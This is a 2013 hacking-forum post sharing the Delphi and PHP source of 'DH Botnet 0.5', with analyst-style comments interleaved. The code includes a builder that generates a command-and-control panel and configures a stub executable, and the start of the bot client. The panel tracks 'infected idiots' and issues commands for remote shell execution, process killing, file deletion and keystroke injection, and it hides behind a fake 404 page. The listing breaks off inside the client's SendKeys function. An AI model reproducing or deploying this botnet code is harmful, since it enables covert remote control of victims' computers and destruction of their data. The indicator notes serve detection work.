EvilZone
Programming and Scripting => Other => : Doddy December 16, 2013, 04:31:10 AM
-
A botnet made in Delphi
Contains the following:
- Command Execution
- List active processes
- Killing processes
- List files in a directory
- Delete any file or directory
- Read files
- Open and close the CD drive
- Hide and show desktop icons
- Hide and show the taskbar
- Open Word and type text automatically
- Make the keyboard type by itself
- Make the mouse go crazy, moving it around the screen
ScreenShots :
(http://doddyhackman.webcindario.com/images/botnet_menu.jpg)
(http://doddyhackman.webcindario.com/images/botnet_accion.jpg)
Sources :
Generator.
// DH Botnet 0.5
// (C) Doddy Hackman 2013
unit gen;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, sSkinManager, ComCtrls, sPageControl, sStatusBar, StdCtrls,
sGroupBox,
sEdit, sLabel, sButton, acPNG, ExtCtrls, Madres, IdHash, IdHashMessageDigest;
type
TForm1 = class(TForm)
sSkinManager1: TsSkinManager;
sPageControl1: TsPageControl;
sStatusBar1: TsStatusBar;
sTabSheet1: TsTabSheet;
sTabSheet2: TsTabSheet;
sTabSheet3: TsTabSheet;
sGroupBox1: TsGroupBox;
sEdit1: TsEdit;
sGroupBox2: TsGroupBox;
sEdit2: TsEdit;
sTabSheet4: TsTabSheet;
sGroupBox3: TsGroupBox;
sGroupBox4: TsGroupBox;
sGroupBox5: TsGroupBox;
sGroupBox6: TsGroupBox;
sLabel1: TsLabel;
sEdit3: TsEdit;
sLabel2: TsLabel;
sEdit4: TsEdit;
sLabel3: TsLabel;
sEdit5: TsEdit;
sLabel4: TsLabel;
sEdit6: TsEdit;
sGroupBox7: TsGroupBox;
sButton1: TsButton;
Image1: TImage;
sTabSheet5: TsTabSheet;
sGroupBox8: TsGroupBox;
Image3: TImage;
sLabel6: TsLabel;
sGroupBox9: TsGroupBox;
sLabel5: TsLabel;
sEdit7: TsEdit;
sLabel7: TsLabel;
sEdit8: TsEdit;
sLabel8: TsLabel;
sEdit9: TsEdit;
sGroupBox10: TsGroupBox;
sGroupBox11: TsGroupBox;
Image2: TImage;
sButton2: TsButton;
OpenDialog1: TOpenDialog;
sEdit10: TsEdit;
procedure sButton2Click(Sender: TObject);
procedure sButton1Click(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
// Functions
procedure savefile(filename, texto: string);
// Writes `texto` to `filename` without a trailing line break: appends when
// the file already exists, otherwise creates it.
var
ar: TextFile;
begin
try
begin
AssignFile(ar, filename);
FileMode := fmOpenWrite;
if FileExists(filename) then
Append(ar)
else
Rewrite(ar);
Write(ar, texto);
CloseFile(ar);
end;
except
// Every exception is swallowed here, so a failed write is not reported to
// the caller and the output file may be missing or incomplete.
end;
end;
function dhencode(texto, opcion: string): string;
// Thanks to Taqyon
// Based on http://www.vbforums.com/showthread.php?346504-DELPHI-Convert-String-To-Hex
//
// Hex codec selected by `opcion`:
//   'encode' - each character of `texto` becomes IntToHex(ord(ch), 2);
//   'decode' - each pair of hex digits in `texto` becomes one character.
// Any other `opcion` returns an empty string.
//
// Analyst note: this is a plain, keyless hex encoding, not encryption. Data
// protected only by this routine can be read back by hex-decoding it.
var
num: integer;
aca: string;
cantidad: integer;
begin
num := 0;
Result := '';
aca := '';
cantidad := 0;
if (opcion = 'encode') then
begin
cantidad := length(texto);
for num := 1 to cantidad do
begin
// IntToHex pads to at least two digits; NOTE(review): a character code
// above $FF would produce more than two digits and break the pairing
// that 'decode' relies on - confirm the inputs are single-byte.
aca := IntToHex(ord(texto[num]), 2);
Result := Result + aca;
end;
end;
if (opcion = 'decode') then
begin
cantidad := length(texto);
// A trailing odd digit is ignored because of the integer division.
for num := 1 to cantidad div 2 do
begin
// '$' prefix makes StrToInt parse the two-character slice as hexadecimal.
aca := Char(StrToInt('$' + Copy(texto, (num - 1) * 2 + 1, 2)));
Result := Result + aca;
end;
end;
end;
//
procedure TForm1.FormCreate(Sender: TObject);
// Form start-up: points the skin manager at the 'Data' folder next to the
// executable, selects the 'neonnight' skin and activates it. UI only.
begin
sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
sSkinManager1.SkinName := 'neonnight';
sSkinManager1.Active := True;
end;
function md5_encode(const texto: String): String;
// Returns the lowercase hexadecimal MD5 digest of `texto`, computed with
// Indy's TIdHashMessageDigest5. The input is hashed once, with no salt.
// NOTE(review): the hash object created below is not freed in this function.
var
makemd5: TIdHashMessageDigest5;
begin
makemd5 := TIdHashMessageDigest5.Create;
Result := LowerCase(makemd5.HashStringAsHex(texto));
end;
procedure TForm1.sButton1Click(Sender: TObject);
// Builder entry point. From the visible code it performs three steps:
//   1. Fills the PHP panel template below with the form fields (panel user,
//      MD5 of the panel password, MySQL host/user/password/database name and
//      load time) and writes it to 'index_botnet.php'.
//   2. Copies Data/stub.exe to 'server_ready.exe' and appends the hex-encoded
//      configuration '[url]...[url][time]...[time]', wrapped in '[63686175]'
//      markers, to the end of that file.
//   3. If an icon path was chosen (sEdit10), rewrites icon group resource 128
//      of the generated executable.
//
// Analyst notes - every value below is taken from this listing:
//   * Host artefacts: files named 'index_botnet.php' and 'server_ready.exe';
//     an executable whose trailing data contains '[63686175]' followed by
//     hex digits. The configuration is only hex-encoded (see dhencode), so
//     the URL and interval can be recovered from a sample by decoding it.
//   * Panel requests sent by clients are HTTP POSTs identified by the field
//     names 'entradatrasera' (with key, ip, pais, username, os, timeout),
//     'sigovivo' (clavenow), 'mandocarajo' (miclave, mirta) and
//     'ordenespabots' (clave).
//   * Operator access: login form behind the '?poraca' query parameter,
//     session cookie 'portal' holding base64(user + '@' + md5(password)).
//     Any other request receives a hand-written '404 Not Found' page, so an
//     HTTP 200 response with that body is itself an indicator.
//   * Panel data lives in MySQL tables 'slaves' and 'ordenes'.
var
linea: string;
aca: THandle;
code: Array [0 .. 9999 + 1] of Char;
nose: DWORD;
marca_uno: string;
lineafinal: string;
stubgenerado: string;
change: DWORD;
valor: string;
codigo_botnet: string;
begin
// PHP panel template. The ACA_VA_* tokens are placeholders replaced further
// down; the text is otherwise written to disk as-is.
codigo_botnet:='<?php'+sLineBreak+
' '+sLineBreak+
'// DH Botnet'+sLineBreak+
'// Version 0.2'+sLineBreak+
'// Coded By Doddy H'+sLineBreak+
' '+sLineBreak+
'// Datos'+sLineBreak+
' '+sLineBreak+
'$username = "ACA_VA_TU_USER";'+sLineBreak+
'$password = "ACA_VA_TU_PASSWORD_EN_MD5";'+sLineBreak+
'$host = "ACA_VA_EL_HOST";'+sLineBreak+
'$userw = "ACA_VA_EL_USER";'+sLineBreak+
'$passw = "ACA_VA_EL_PASS";'+sLineBreak+
'$db = "ACA_VA_EL_NOMBRE";'+sLineBreak+
'$tiempo_de_carga = "ACA_VA_EL_TIEMPO_DE_CARGA";'+sLineBreak+
' '+sLineBreak+
'//'+sLineBreak+
' '+sLineBreak+
'// Start the party'+sLineBreak+
' '+sLineBreak+
'error_reporting(0);'+sLineBreak+
'mysql_connect($host, $userw, $passw);'+sLineBreak+
'mysql_select_db($db);'+sLineBreak+
' '+sLineBreak+
'//'+sLineBreak+
' '+sLineBreak+
'// Registro'+sLineBreak+
'if (isset($_POST[''entradatrasera''])) {'+sLineBreak+
' $key = mysql_real_escape_string($_POST[''key'']);'+sLineBreak+
' $ip = mysql_real_escape_string($_POST[''ip'']);'+sLineBreak+
' $pais = mysql_real_escape_string($_POST[''pais'']);'+sLineBreak+
' $username = mysql_real_escape_string($_POST[''username'']);'+sLineBreak+
' $os = mysql_real_escape_string($_POST[''os'']);'+sLineBreak+
' $timeout = mysql_real_escape_string($_POST[''timeout'']);'+sLineBreak+
' $control = 0;'+sLineBreak+
' $rea = mysql_query("select clave from slaves");'+sLineBreak+
' while ($ver = mysql_fetch_array($rea)) {'+sLineBreak+
' if ($ver[0] == $key) {'+sLineBreak+
' $control = 1;'+sLineBreak+
' }'+sLineBreak+
' }'+sLineBreak+
' if ($control == 0) {'+sLineBreak+
' mysql_query("INSERT INTO slaves(id,clave,ip,pais,user,os,timeout)values(NULL,''$key'',''$ip'',''$pais'',''$username'',''$os'',''$timeout'')");'+sLineBreak+
' mysql_query("INSERT INTO ordenes(id,clave)values(NULL,''$key'')");'+sLineBreak+
' }'+sLineBreak+
'}'+sLineBreak+
'//'+sLineBreak+
'// Bots siguen vivos'+sLineBreak+
'if (isset($_POST[''sigovivo''])) {'+sLineBreak+
' $clave = mysql_real_escape_string($_POST[''clavenow'']);'+sLineBreak+
' mysql_query("UPDATE slaves set estado=''1'' where clave=''$clave''");'+sLineBreak+
'}'+sLineBreak+
'// Bots mandan rta'+sLineBreak+
'if (isset($_POST[''mandocarajo''])) {'+sLineBreak+
' $clave = mysql_real_escape_string($_POST[''miclave'']);'+sLineBreak+
' $rta = mysql_real_escape_string($_POST[''mirta'']);'+sLineBreak+
' mysql_query("UPDATE ordenes set rta=''$rta'' where clave=''$clave''");'+sLineBreak+
'}'+sLineBreak+
'//'+sLineBreak+
'// Ordenes para bots'+sLineBreak+
'if (isset($_POST[''ordenespabots''])) {'+sLineBreak+
' $h = mysql_real_escape_string($_POST[''clave'']);'+sLineBreak+
' $rea = mysql_query("select * from ordenes where clave=''$h''");'+sLineBreak+
' $ver = mysql_fetch_array($rea);'+sLineBreak+
' $id = mysql_real_escape_string($ver[0]);'+sLineBreak+
' $clave = mysql_real_escape_string($ver[1]);'+sLineBreak+
' $orden = mysql_real_escape_string($ver[2]);'+sLineBreak+
' $arg1 = mysql_real_escape_string($ver[3]);'+sLineBreak+
' $arg2 = mysql_real_escape_string($ver[4]);'+sLineBreak+
' $arg3 = mysql_real_escape_string($ver[5]);'+sLineBreak+
' $rta = mysql_real_escape_string($ver[6]);'+sLineBreak+
' echo "[+] ID : " . htmlentities($id) . "<br>";'+sLineBreak+
' echo "[+] Clave : " . htmlentities($clave) . "<br>";'+sLineBreak+
' echo "[+] Orden : " . htmlentities($orden) . "<br>";'+sLineBreak+
' echo "[+] Arg1 : " . htmlentities($arg1) . "<br>";'+sLineBreak+
' echo "[+] Arg2 : " . htmlentities($arg2) . "<br>";'+sLineBreak+
' echo "[+] Arg3 : " . htmlentities($arg3) . "<br>";'+sLineBreak+
' echo "[+] Rta : " . htmlentities($rta) . "<br>";'+sLineBreak+
'}'+sLineBreak+
'//'+sLineBreak+
'// Main'+sLineBreak+
'elseif (isset($_COOKIE[''portal''])) {'+sLineBreak+
' colores();'+sLineBreak+
' $st = base64_decode($_COOKIE[''portal'']);'+sLineBreak+
' $plit = preg_split("/@/", $st);'+sLineBreak+
' $user = $plit[0];'+sLineBreak+
' $pass = $plit[1];'+sLineBreak+
' if ($user == $username and $pass == $password) {'+sLineBreak+
' echo "<title>DH Botnet 0.2</title>";'+sLineBreak+
' if (isset($_POST[''instalar''])) {'+sLineBreak+
' $todo = "'+sLineBreak+
'create table slaves ('+sLineBreak+
'id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,'+sLineBreak+
'clave TEXT NOT NULL,'+sLineBreak+
'ip TEXT NOT NULL,'+sLineBreak+
'pais TEXT NOT NULL,'+sLineBreak+
'user TEXT NOT NULL,'+sLineBreak+
'os TEXT NOT NULL,'+sLineBreak+
'timeout TEXT NOT NULL,'+sLineBreak+
'estado TEXT NOT NULL,'+sLineBreak+
'PRIMARY KEY (id)'+sLineBreak+
');'+sLineBreak+
'";'+sLineBreak+
' $todo2 = "'+sLineBreak+
'create table ordenes ('+sLineBreak+
'id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,'+sLineBreak+
'clave TEXT NOT NULL,'+sLineBreak+
'orden TEXT NOT NULL,'+sLineBreak+
'arg1 TEXT NOT NULL,'+sLineBreak+
'arg2 TEXT NOT NULL,'+sLineBreak+
'arg3 TEXT NOT NULL,'+sLineBreak+
'rta TEXT NOT NULL,'+sLineBreak+
'PRIMARY KEY (id)'+sLineBreak+
');'+sLineBreak+
'";'+sLineBreak+
' if (mysql_query($todo)) {'+sLineBreak+
' if (mysql_query($todo2)) {'+sLineBreak+
' echo "<script>alert(''Installed'');</script>";'+sLineBreak+
' }'+sLineBreak+
' } else {'+sLineBreak+
' echo "<script>alert(''Error'');</script>";'+sLineBreak+
' }'+sLineBreak+
' }'+sLineBreak+
' if (mysql_num_rows(mysql_query("show tables like ''slaves''"))) {'+sLineBreak+
' // TODO EL CODIGO DEL MENU'+sLineBreak+
' if (isset($_POST[''about''])) {'+sLineBreak+
' echo "'+sLineBreak+
'<center>'+sLineBreak+
' '+sLineBreak+
'<h1>[++] Commands :</h1><br><br>'+sLineBreak+
' '+sLineBreak+
'<h2>'+sLineBreak+
'CMD [command]<br>'+sLineBreak+
'GetProcess<br>'+sLineBreak+
'KillProcess [pid]<br>'+sLineBreak+
'ListDir [directory]<br>'+sLineBreak+
'Delete [file]<br>'+sLineBreak+
'OpenFile [file]<br>'+sLineBreak+
'OpenCD <br>'+sLineBreak+
'CloseCD<br>'+sLineBreak+
'HideIcons<br>'+sLineBreak+
'ShowIcons<br>'+sLineBreak+
'HideTaskbar<br>'+sLineBreak+
'ShowTaskbar<br>'+sLineBreak+
'OpenWord [text]<br>'+sLineBreak+
'SendKeys [text]<br>'+sLineBreak+
'CrazyMouse [time]<br>'+sLineBreak+
'</h2>'+sLineBreak+
'<br><br><br>";'+sLineBreak+
' echo ''<a href="javascript:history.back()"><h1>Back</h1></a></center>'';'+sLineBreak+
' exit(1);'+sLineBreak+
' }'+sLineBreak+
' if (isset($_GET[''borrar''])) {'+sLineBreak+
' $id = $_GET[''borrar''];'+sLineBreak+
' if (is_numeric($id)) {'+sLineBreak+
' if (@mysql_query("delete from slaves where id=''$id''")) {'+sLineBreak+
' if (@mysql_query("delete from ordenes where id=''$id''")) {'+sLineBreak+
' echo "<script>alert(''Deleted'');</script>";'+sLineBreak+
' echo "<META HTTP-EQUIV=''Refresh'' CONTENT=''0;URL=?''>";'+sLineBreak+
' }'+sLineBreak+
' }'+sLineBreak+
' } else {'+sLineBreak+
' echo "<script>alert(''DIE MOTHER FUCKER'');</script>";'+sLineBreak+
' }'+sLineBreak+
' }'+sLineBreak+
' if (isset($_GET[''console''])) {'+sLineBreak+
' $id = $_GET[''console''];'+sLineBreak+
' if (is_numeric($id)) {'+sLineBreak+
' $re = mysql_query("select * from ordenes where id=''$id''");'+sLineBreak+
' $ver = mysql_fetch_array($re);'+sLineBreak+
' echo "<center><br><h1>Console</h1><br>";'+sLineBreak+
' echo "<center><textarea cols=80 rows=40 name=code>";'+sLineBreak+
' echo htmlentities($ver[6]);'+sLineBreak+
' echo "</textarea></center><br>";'+sLineBreak+
' echo ''<a href="javascript:history.back()"><h1>Back</h1></a></center>'';'+sLineBreak+
' // ACTUALIZAR A NADA'+sLineBreak+
' mysql_query("UPDATE ordenes set orden='''',arg1='''',arg2='''',arg3='''',rta='''' where id=" . $id);'+sLineBreak+
' exit(1);'+sLineBreak+
' } else {'+sLineBreak+
' echo "<script>alert(''DIE MOTHER FUCKER'');</script>";'+sLineBreak+
' }'+sLineBreak+
' }'+sLineBreak+
' if (isset($_POST[''mandarcmd''])) { // MUY IMPORTANTE'+sLineBreak+
' $op = mysql_real_escape_string($_POST[''options'']);'+sLineBreak+
' $id = mysql_real_escape_string($_POST[''idiotas'']);'+sLineBreak+
' $orden1 = mysql_real_escape_string($_POST[''cmd1'']);'+sLineBreak+
' $orden2 = mysql_real_escape_string($_POST[''cmd2'']);'+sLineBreak+
' $orden3 = mysql_real_escape_string($_POST[''cmd3'']);'+sLineBreak+
' mysql_query("UPDATE ordenes set orden=''$op'',arg1=''$orden1'',arg2=''$orden2'',arg3=''$orden3'' where id=" . $id);'+sLineBreak+
' $re = mysql_query("select * from slaves where id=''$id''");'+sLineBreak+
' $ver = mysql_fetch_array($re);'+sLineBreak+
' $timeout = $ver[6];'+sLineBreak+
' $timeout = $timeout + $tiempo_de_carga;'+sLineBreak+
' $time = $timeout;'+sLineBreak+
' $timeout = $timeout * 1000;'+sLineBreak+
' echo "<script>alert(''Wait " . htmlentities($time) . " seconds'');</script>";'+sLineBreak+
' echo "'+sLineBreak+
'<script type=\"text/javascript\">'+sLineBreak+
'setTimeout (\"location.href=''?console=$id''\",$timeout);'+sLineBreak+
'</script>'+sLineBreak+
'";'+sLineBreak+
' } //'+sLineBreak+
' echo "'+sLineBreak+
'<br><br>'+sLineBreak+
'<center>'+sLineBreak+
'<h1>Infected idiots</h1>'+sLineBreak+
'<br><br>'+sLineBreak+
'";'+sLineBreak+
' $re = mysql_query("select count(clave) from slaves");'+sLineBreak+
' $ver = mysql_fetch_array($re);'+sLineBreak+
' if ($ver[0] == 0) { //'+sLineBreak+
' echo "<script>alert(''No idiots'');</script>";'+sLineBreak+
' } else {'+sLineBreak+
' $re = mysql_query("select * from slaves");'+sLineBreak+
' echo "'+sLineBreak+
'<table border=1 width=1100>'+sLineBreak+
'<td ><b>ID</b></td><td ><b>Key</b></td><td ><b>IP</b></td><td ><b>Country</b></td><td ><b>Username</b></td><td ><b>OS</b></td><td ><b>Timeout</b></td><td><b>Status</b></td><td><b>Option</b></td><tr>'+sLineBreak+
'";'+sLineBreak+
' $idiotas = array();'+sLineBreak+
' while ($ver = mysql_fetch_array($re)) {'+sLineBreak+
' if ($ver[7] == 1) {'+sLineBreak+
' $estado = "Online";'+sLineBreak+
' } else {'+sLineBreak+
' $estado = "Offline";'+sLineBreak+
' }'+sLineBreak+
' echo "<td >" . htmlentities($ver[0]) . "</td><td >" . htmlentities($ver[1]) . "</td><td >" . htmlentities($ver[2]) . "</td><td >" . htmlentities($ver[3]) . "</td>";'+sLineBreak+
' echo "<td >" . htmlentities($ver[4]) . "</td><td >" . htmlentities($ver[5]) . "</td><td >" . htmlentities($ver[6]) . "</td><td>" . $estado . "<td><a href=?borrar=" . $ver[0] . ">Delete</a></td><tr>";'+sLineBreak+
' $idiotas[] = $ver[0];'+sLineBreak+
' mysql_query("UPDATE slaves set estado='''' where id=" . $ver[0]);'+sLineBreak+
' }'+sLineBreak+
' echo "</table>";'+sLineBreak+
' } //'+sLineBreak+
' echo "<form action='''' method=POST>";'+sLineBreak+
' echo "'+sLineBreak+
' '+sLineBreak+
'<br><br><br><br>'+sLineBreak+
' '+sLineBreak+
'<table>'+sLineBreak+
'<td>'+sLineBreak+
'<b>Idiot :</b>'+sLineBreak+
'</td>'+sLineBreak+
'<td>'+sLineBreak+
'<select name=idiotas>";'+sLineBreak+
' foreach($idiotas as $idiota) {'+sLineBreak+
' echo "<option>" . $idiota . "</option>";'+sLineBreak+
' }'+sLineBreak+
' echo "'+sLineBreak+
'</select>'+sLineBreak+
'</td><tr>'+sLineBreak+
' '+sLineBreak+
'<td><b>Options : </b></td>'+sLineBreak+
'<td><select name=options>'+sLineBreak+
'<option>CMD</option>'+sLineBreak+
'<option>GetProcess</option>'+sLineBreak+
'<option>KillProcess</option>'+sLineBreak+
'<option>ListDir</option>'+sLineBreak+
'<option>Delete</option>'+sLineBreak+
'<option>OpenFile</option>'+sLineBreak+
'<option>OpenCD</option>'+sLineBreak+
'<option>CloseCD</option>'+sLineBreak+
'<option>HideIcons</option>'+sLineBreak+
'<option>ShowIcons</option>'+sLineBreak+
'<option>HideTaskbar</option>'+sLineBreak+
'<option>ShowTaskbar</option>'+sLineBreak+
'<option>OpenWord</option>'+sLineBreak+
'<option>SendKeys</option>'+sLineBreak+
'<option>CrazyMouse</option>'+sLineBreak+
'</select></td><tr>'+sLineBreak+
' '+sLineBreak+
'<td><b>Command 1 : </b></td><td><input type=text name=cmd1></td><tr>'+sLineBreak+
'<td><b>Command 2 : </b></td><td><input type=text name=cmd2></td><tr>'+sLineBreak+
'<td><b>Command 3 : </b></td><td><input type=text name=cmd3></td>'+sLineBreak+
'</table><br>'+sLineBreak+
'<input type=submit name=mandarcmd value=Send> <input type=submit name=about value=Help>'+sLineBreak+
'";'+sLineBreak+
' echo "</form>";'+sLineBreak+
' echo "<br><br><br><br><br><br><br><h2>-- == (C) Doddy Hackman 2013 || Contact : lepuke[at]hotmail[com] || Web : http://doddyhackman.webcindario.com == --</h2>";'+sLineBreak+
' } else {'+sLineBreak+
' echo "'+sLineBreak+
'<center><br><br>'+sLineBreak+
'<form action='''' method=POST>'+sLineBreak+
'<h2>Want to install DH Botnet 0.2 ?</h2><br><br>'+sLineBreak+
'<input type=submit name=instalar value=Install>'+sLineBreak+
'</form>";'+sLineBreak+
' }'+sLineBreak+
' exit(1);'+sLineBreak+
' }'+sLineBreak+
'} elseif (isset($_POST[''login''])) {'+sLineBreak+
' if ($_POST[''user''] == $username and md5($_POST[''passwor'']) == $password) {'+sLineBreak+
' setcookie("portal", base64_encode($_POST[''user''] . "@" . md5($_POST[''passwor''])));'+sLineBreak+
' echo "<script>alert(''Welcome idiot'');</script>";'+sLineBreak+
' echo ''<meta http-equiv="refresh" content=0;URL=>'';'+sLineBreak+
' } else {'+sLineBreak+
' echo "<script>alert(''DIE MOTHER FUCKER DIE'');</script>";'+sLineBreak+
' echo ''<meta http-equiv="refresh" content=0;URL=>'';'+sLineBreak+
' }'+sLineBreak+
'} elseif (isset($_GET[''poraca''])) {'+sLineBreak+
' colores();'+sLineBreak+
' echo "'+sLineBreak+
'<br><h1><center>Login</center></h1>'+sLineBreak+
'<br><br><center>'+sLineBreak+
'<form action='''' method=POST>'+sLineBreak+
'<b>Username : </b><input type=text name=user><br><br>'+sLineBreak+
'<b>Password : </b><input type=password name=passwor><br><br>'+sLineBreak+
'<input type=submit name=login value=Enter><br>'+sLineBreak+
'</form>'+sLineBreak+
'</center><br><br>";'+sLineBreak+
'} else {'+sLineBreak+
' error();'+sLineBreak+
'}'+sLineBreak+
'//'+sLineBreak+
'// Funciones secundarias'+sLineBreak+
'function colores() {'+sLineBreak+
' // Colores'+sLineBreak+
' $color = "#00FF00";'+sLineBreak+
' $fondo = "#000000";'+sLineBreak+
' echo "'+sLineBreak+
' '+sLineBreak+
'<STYLE type=text/css>'+sLineBreak+
' '+sLineBreak+
'body,a:link {'+sLineBreak+
'background-color: $fondo;'+sLineBreak+
'color:$color;'+sLineBreak+
'Courier New;'+sLineBreak+
'cursor:crosshair;'+sLineBreak+
'font: normal 0.7em sans-serif,Arial;'+sLineBreak+
'}'+sLineBreak+
' '+sLineBreak+
'input,textarea,fieldset,select,table,td,tr,option,select {'+sLineBreak+
'font: normal 13px Verdana, Arial, Helvetica,'+sLineBreak+
'sans-serif;'+sLineBreak+
'background-color:$fondo;'+sLineBreak+
'color:$color;'+sLineBreak+
'border: solid 1px $color;'+sLineBreak+
'border-color:$color'+sLineBreak+
'}'+sLineBreak+
' '+sLineBreak+
'a:link,a:visited,a:active {'+sLineBreak+
'color:$color;'+sLineBreak+
'font: normal 10px Verdana, Arial, Helvetica,'+sLineBreak+
'sans-serif;'+sLineBreak+
'text-decoration: none;'+sLineBreak+
'}'+sLineBreak+
' '+sLineBreak+
'</style>'+sLineBreak+
' '+sLineBreak+
'";'+sLineBreak+
'}'+sLineBreak+
'function error() {'+sLineBreak+
' echo ''<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">'+sLineBreak+
'<html><head>'+sLineBreak+
'<title>404 Not Found</title>'+sLineBreak+
'</head><body>'+sLineBreak+
'<h1>Not Found</h1>'+sLineBreak+
'<p>The requested URL was not found on this server.</p>'+sLineBreak+
'</body></html>'';'+sLineBreak+
' exit(1);'+sLineBreak+
'}'+sLineBreak+
'// End'+sLineBreak+
'mysql_close();'+sLineBreak+
'//'+sLineBreak+
' '+sLineBreak+
'// The End ?'+sLineBreak+
' '+sLineBreak+
'?>'+sLineBreak;
// Placeholder substitution. The form text is inserted verbatim into PHP
// double-quoted string literals; only the panel password is transformed
// (to its MD5 hex digest) before insertion.
codigo_botnet := StringReplace(codigo_botnet, 'ACA_VA_TU_USER', sEdit7.Text,
[rfReplaceAll, rfIgnoreCase]);
codigo_botnet := StringReplace(codigo_botnet, 'ACA_VA_TU_PASSWORD_EN_MD5',
md5_encode(sEdit8.Text), [rfReplaceAll, rfIgnoreCase]);
codigo_botnet := StringReplace(codigo_botnet, 'ACA_VA_EL_HOST', sEdit3.Text,
[rfReplaceAll, rfIgnoreCase]);
codigo_botnet := StringReplace(codigo_botnet, 'ACA_VA_EL_USER', sEdit4.Text,
[rfReplaceAll, rfIgnoreCase]);
codigo_botnet := StringReplace(codigo_botnet, 'ACA_VA_EL_PASS', sEdit5.Text,
[rfReplaceAll, rfIgnoreCase]);
codigo_botnet := StringReplace(codigo_botnet, 'ACA_VA_EL_NOMBRE',
sEdit6.Text, [rfReplaceAll, rfIgnoreCase]);
codigo_botnet := StringReplace(codigo_botnet, 'ACA_VA_EL_TIEMPO_DE_CARGA',
sEdit9.Text, [rfReplaceAll, rfIgnoreCase]);
stubgenerado := 'server_ready.exe';
// The panel file is written relative to the current directory; any previous
// copy is deleted first because savefile() appends to existing files.
DeleteFile('index_botnet.php');
savefile('index_botnet.php', codigo_botnet);
// Configuration record: panel URL (sEdit1) and interval (sEdit2) between
// literal [url]/[time] tags, hex-encoded and wrapped in the fixed
// '[63686175]' marker.
lineafinal := '[url]' + sEdit1.Text + '[url]' + '[time]' + sEdit2.Text +
'[time]';
marca_uno := '[63686175]' + dhencode(lineafinal, 'encode') + '[63686175]';
aca := INVALID_HANDLE_VALUE;
nose := 0;
DeleteFile(stubgenerado);
CopyFile(PChar(ExtractFilePath(Application.ExeName) + '/' + 'Data/stub.exe'),
PChar(ExtractFilePath(Application.ExeName) + '/' + stubgenerado), True);
linea := marca_uno;
// NOTE(review): `code` is a fixed-size local buffer that is not cleared and
// StrCopy does not bound the copy - a long URL could exceed it.
StrCopy(code, PChar(linea));
aca := CreateFile(PChar(stubgenerado), GENERIC_WRITE, FILE_SHARE_READ, nil,
OPEN_EXISTING, 0, 0);
if (aca <> INVALID_HANDLE_VALUE) then
begin
// Append at end of file, after the PE image. A fixed 9999 bytes are written
// starting at `code`, so everything after the marker string is whatever the
// buffer already held. The text is stored in the compiler's native Char
// width (presumably UTF-16 given the wide-string calls below - confirm
// against a sample when writing a signature).
SetFilePointer(aca, 0, nil, FILE_END);
WriteFile(aca, code, 9999, nose, nil);
CloseHandle(aca);
end;
// Optional icon replacement: icon group resource 128 of the generated file
// is replaced with the chosen .ico via the resource-update API.
// LoadIconGroupResourceW is not declared in this listing (presumably from
// the Madres unit in the uses clause - confirm).
if not(sEdit10.Text = '') then
begin
try
begin
valor := IntToStr(128);
change := BeginUpdateResourceW
(PWideChar(wideString(ExtractFilePath(Application.ExeName)
+ '/' + stubgenerado)), False);
LoadIconGroupResourceW(change, PWideChar(wideString(valor)), 0,
PWideChar(wideString(sEdit10.Text)));
EndUpdateResourceW(change, False);
sStatusBar1.Panels[0].Text := '[+] Done ';
sStatusBar1.Update;
end;
except
begin
sStatusBar1.Panels[0].Text := '[-] Error';
sStatusBar1.Update;
end;
end;
end
else
begin
// '[+] Done ' is shown here without checking whether the copy or the append
// above succeeded.
sStatusBar1.Panels[0].Text := '[+] Done ';
sStatusBar1.Update;
end;
end;
procedure TForm1.sButton2Click(Sender: TObject);
// Icon picker: opens a file dialog restricted to *.ico, previews the chosen
// file in Image2 and stores its path in sEdit10, which sButton1Click reads
// to decide whether to replace the generated executable's icon.
begin
OpenDialog1.InitialDir := GetCurrentDir;
OpenDialog1.Filter := 'ICO|*.ico|';
if OpenDialog1.Execute then
begin
Image2.Picture.LoadFromFile(OpenDialog1.filename);
sEdit10.Text := OpenDialog1.filename;
end;
end;
end.
// The End ?
Stub.
// DH Botnet 0.5
// (C) Doddy Hackman 2013
// Stub
program stub;
// {$APPTYPE CONSOLE}
{$POINTERMATH ON}
uses
SysUtils, WinInet, Windows, TlHelp32, ShellApi;
var
datos: string;
clave: string;
ip: string;
pais: string;
user: string;
os: string;
url_master: string;
time: string;
code: string;
ordenes_re: string;
ordenes_cmd: string;
ordenes_ar1: string;
ordenes_ar2: string;
ordenes_ar3: string;
var
dir_hide, dir, carpeta, nombrereal, directorio, rutareal, yalisto: string;
registro: HKEY;
ob: THandle;
codex: Array [0 .. 9999 + 1] of Char;
nose: DWORD;
todo: string;
// Functions server
function crazy_mouse(number: string): string;
// Nuisance command: for i = 1..StrToInt(number) sleeps one second and moves
// the cursor to screen position (i, i), so the call blocks for roughly
// `number` seconds. Always returns the fixed status string below.
// StrToInt raises on non-numeric input; no handler is visible here.
var
i: integer;
code: string;
begin
code := '';
For i := 1 to StrToInt(number) do
begin
Sleep(1000);
SetCursorPos(i, i);
end;
code := '[?] Crazy Mouse : OK';
Result := code;
end;
function SendKeys(texto: string): string;
// Thanks to Remy Lebeau for the help
//
// Injects `texto` as synthetic keyboard input: builds one key-down and one
// key-up INPUT record per character (KEYEVENTF_UNICODE, so wScan carries the
// character code and wVk is 0) and submits them with a single SendInput call.
// The keystrokes go to whatever window has focus at that moment.
// Always returns '[?] SendKeys : OK'; the SendInput result is not checked.
// NOTE(review): the buffer from GetMem is not released in this function.
var
eventos: PInput;
controlb, controla: integer;
code: string;
begin
code := '';
code := '[?] SendKeys : OK';
// Two records (press + release) per character.
GetMem(eventos, SizeOf(TInput) * (Length(texto) * 2));
controla := 0;
for controlb := 1 to Length(texto) do
begin
// Key down.
eventos[controla].Itype := INPUT_KEYBOARD;
eventos[controla].ki.wVk := 0;
eventos[controla].ki.wScan := ord(texto[controlb]);
eventos[controla].ki.dwFlags := KEYEVENTF_UNICODE;
eventos[controla].ki.time := 0;
eventos[controla].ki.dwExtraInfo := 0;
Inc(controla);
// Key up for the same character.
eventos[controla].Itype := INPUT_KEYBOARD;
eventos[controla].ki.wVk := 0;
eventos[controla].ki.wScan := ord(texto[controlb]);
